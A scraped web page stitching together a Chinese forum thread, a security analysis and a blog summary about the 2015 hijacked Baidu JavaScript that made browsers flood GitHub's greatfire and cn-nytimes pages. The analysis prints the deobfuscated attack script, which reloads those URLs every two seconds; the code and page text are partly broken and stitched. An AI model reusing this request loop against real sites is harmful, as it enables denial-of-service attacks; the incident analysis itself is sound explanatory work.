malicious detectedjavascript detected on this domain怎么回事

来源:蜘蛛抓取(WebSpider) 时间:2015-03-31 10:37 标签: javascript self this
查看: 2407|回复: 6
上午开始WARNING: malicious javascript detected on this domain
今天上午开始一直跳这个WARNING: malicious javascript detected on this domain,但是没检查出问题啊据说好多人都这样
本帖最后由 aaa444 于
14:42 编辑
1.jpg (16.6 KB, 下载次数: 5)
5&天前 上传
和LZ一样的情况,难道是系统是win8.1的过?等大神解答
本帖最后由 逆枫寒 于
15:39 编辑
和LZ一样的情况,难道是系统是win8.1的过?等大神解答
相关报导& && && && &
总结起来就是
G{过}F{滤}W http劫持嵌入js访问
和 ,被劫持的用户一访问其他网页就无形中DDOS了github, github迫于压力返回WARNING: malicious javascript detected on this domain
相关报导http://drops.wooyun.org/papers/5398& && && && &http://www.solidot.org/story?sid=43489
谢谢回复!!现在是不是没事了?
谢谢回复!!现在是不是没事了?
是的,已修复
是的,已修复
前段时间好了,不过这两天又开始了,访问大陆网站会偶尔弹窗,没太大问题我也就放心了
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,临时解决方法:
修改hosts,添加""127.0.0.1 " 。
详细原因分析:今天中午刷着全国最大的信息安全从业人员同性交友社区zone.wooyun.org的时候,忽然浏览器每隔2秒就不断的弹窗:
malicious javascript detected on this domain
我第一反应就是不知道哪个调皮的基友又把zone给XSS了,马上打开开发者工具分析。
之后立刻发现弹窗的js居然是从github加载的:
可是为什么乌云会从github加载js呢,并且还是从greatfire和纽约时报镜像加载。
第一反应是页面有xss或者js被劫持了,找了半天终于找到了,居然是
这个js的确被乌云加载了没错,这是百度统计的js代码,打开后里面是一个简单加密后的js,eval了一串编码后的内容,随便找了个在线解密看了下,发现如下内容:
document.write("&script src='/jquery/2.0.0/jquery.min.js'&x3c/script&");
!window.jQuery && document.write("&script src='/jquery-latest.js'&x3c/script&");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
var a = new D
return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
url_array = ["/greatfire/", "/cn-nytimes/"];
NUM = url_array.
function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
function get(a) {
dataType: "script",
timeout: 1E4,
cache: !0,
beforeSend: function() {
requestTime = (new Date).getTime()
complete: function() {
responseTime = (new Date).getTime();
b = Math.floor(responseTime - requestTime);
3E5 & responseTime - startime && (r_send(b), count += 1)
function r_send(a) {
setTimeout("r_send2()", a)
setTimeout("r_send2()", 2E3);
大概功能就是关闭缓存后每隔2秒加载一次
url_array = ["/greatfire/", "/cn-nytimes/"];
里面的两个url
问了下墙内的小伙伴们,他们看到的js都是正常的,但是通过墙外ip访问
就会得到上面的js文件,每隔2秒请求一下这两个url。
打开twitter看了下,似乎从3月18号以来Github就受到了DDoS攻击,之后greatfire把被攻击的页面内容换成了
alert("WARNING: malicious javascript detected on this domain")
以弹窗的方式阻止了js的循环执行。
图3 国外ip traceroute到的记录
似乎DNS并没有被劫持,看来是像之前一样直接把IP劫持了或者直接在HTTP协议里替换文件。
扫了下端口,只开了80和443,通过https协议访问后是正常的空页面(只有带referer才会出现js文件)。
作者要进行抓包分析时劫持已经停止,在twitter上看到有人已经分析过引用如下:
抓包跟踪,正常百度服务器返回给我日本VPS的TTL为51, RESP返回HTTP 200 OK的报文的TTL是47,可以确定的是有中间设备对VPS发了伪造报文。
真是无耻,呵呵
忽然想起一句话,之前DNS被劫持到外国服务器的时候某站长说的:
They have weaponized their entire population.
现在应该是:
They have weaponized their entire population of the Earth.文字大小 &
GitHub 前幾天有發生掛掉的情況,沒想到居然是被 DDOS 攻擊打掛的,但是已經這種規模的網站,很難想像是如何打掛的,有文章說明囉~
官方新聞:
The attack began around 2AM UTC on Thursday, March 26, and involves a wide combination of attack vectors.
GitHub 遭受的 DDoS 攻擊紀錄
依照此此篇文章說明:,主因是由 Baidu 的 JS 是被串改,加入一段 JS Code,摘錄 JS Code 的重點如下:
url_array = ["/greatfire/", "/cn-nytimes/"];
NUM = url_array.
function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
setTimeout("r_send2()", 2E3);
大概意思就是兩秒會發送一次 request 到:
/greatfire/ (Greatfire)
/cn-nytimes/ (紐約時報中文網)
不曉得中間有什麼深仇大恨,但是 GitHub 是無辜受害者... XD
而 GitHub 這兩個網頁目前處理方式是換成下述這段 Code:
alert("WARNING: malicious javascript detected on this domain")
藉由 JavaScript alert 來避免 2秒不斷的 DDOS 攻擊。
由上述文章的意思,有可能是百度統計用的 JS 被竄改,但是下面這篇測試報告,就驚人了。
下述摘錄此篇文章最下面的一段話:
【更正】經過本人測試,英國、美國、台灣訪問均指向IP 61.135.185.140,而該IP來自中國,因此並非存放於CDN的程式碼有問題,而是存取該檔案的連線通過中國防火牆時遭到竄改。
我不確定問題端到底是 Baidu 還是 GFW,不過,如果是 被 GFW(中國防火牆) 而竄改,那... 這個 DDOS 應該沒公司能擋得下來,而且是想讓誰掛,誰就得掛的地步。
想在手機查閱更多Javascript資訊?
This work, unless otherwise expressly stated, is licensed under a.
分享到Facebook
Please enable JavaScript to view the
109 人訂閱
| 友站連結:
Powered by您好,欢迎来到快答网,喜欢的话加入到收藏夹!
怎么解决malicious javascript detected this domain
被浏览10次
用微信扫描二维码分享至好友和朋友圈分享到:
所有问题分类

我要回帖

更多关于 javascript self this 的文章

 

随机推荐